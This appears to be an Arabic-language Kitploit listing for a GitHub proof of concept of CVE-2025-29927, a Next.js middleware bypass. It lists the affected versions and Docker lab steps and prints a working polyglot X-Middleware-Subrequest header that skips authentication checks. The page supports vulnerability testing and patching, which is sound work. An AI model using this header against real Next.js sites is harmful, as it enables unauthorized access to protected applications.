Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-29927-PoC — PoC لـ CVE-2025-29927: ثغرة تجاوز Middleware في Next.js. يوضح كيف يمكن لـ x-middleware-subrequest تجاوز فحوصات المصادقة. يتضمن إعداد Docker للاختبار. | Kitploit
أدوات/GitHubGitHub/alihussainzada/cve-2025-29927-poc
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubalihussainzada/cve-2025-29927-poc

CVE-2025-29927-PoC

PoC لـ CVE-2025-29927: ثغرة تجاوز Middleware في Next.js. يوضح كيف يمكن لـ x-middleware-subrequest تجاوز فحوصات المصادقة. يتضمن إعداد Docker للاختبار.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
519منذ سنة واحدةلم تتم المراجعة بعد

CVE-2025-29927: ثغرة تجاوز الوسيط (Middleware) في Next.js — إثبات الفكرة (PoC)

يستعرض هذا المستودع ثغرة CVE-2025-29927 في Next.js، حيث يمكن استخدام الترويسة الداخلية x-middleware-subrequest لتجاوز فحوصات الوسيط مثل المصادقة.

الإصدارات المتأثرة

  • Next.js 15.x < 15.2.3
  • Next.js 14.x < 14.2.25
  • Next.js 13.x < 13.5.9

خطوات إعادة الإنتاج

1. استنساخ المستودع:

git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git

2. الانتقال إلى مجلد المشروع:

cd CVE-2025-29927-PoC

3. إنشاء سر (Secret):

openssl rand -base64 32

4. تحديث السر في ملف .env:

NEXTAUTH_SECRET=your_generated_secret

5. البناء والتشغيل باستخدام Docker:

docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs

إثبات الفكرة (PoC)

يمكننا تبسيط استغلال هذه المشكلة إلى حد كبير باستخدام polyglot يتيح لنا تغطية الحالات المحتملة المختلفة بفعالية. تمكّنا من تحقيق ذلك باستخدام ترويسة HTTP التالية، المستخدمة للتحقق من وجود تجاوز للمصادقة:

X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

توجيه المستخدمين

مثال على الاستغلال

الاعتمادات/المصادر

  • مدونة Next.js حول CVE-2025-29927
  • بحث Zhero لأمن الويب: Next.js والوسيط الفاسد
  • بحث Assetnote الأمني: تحليل تجاوز الوسيط في Next.js
تنزيل الأداة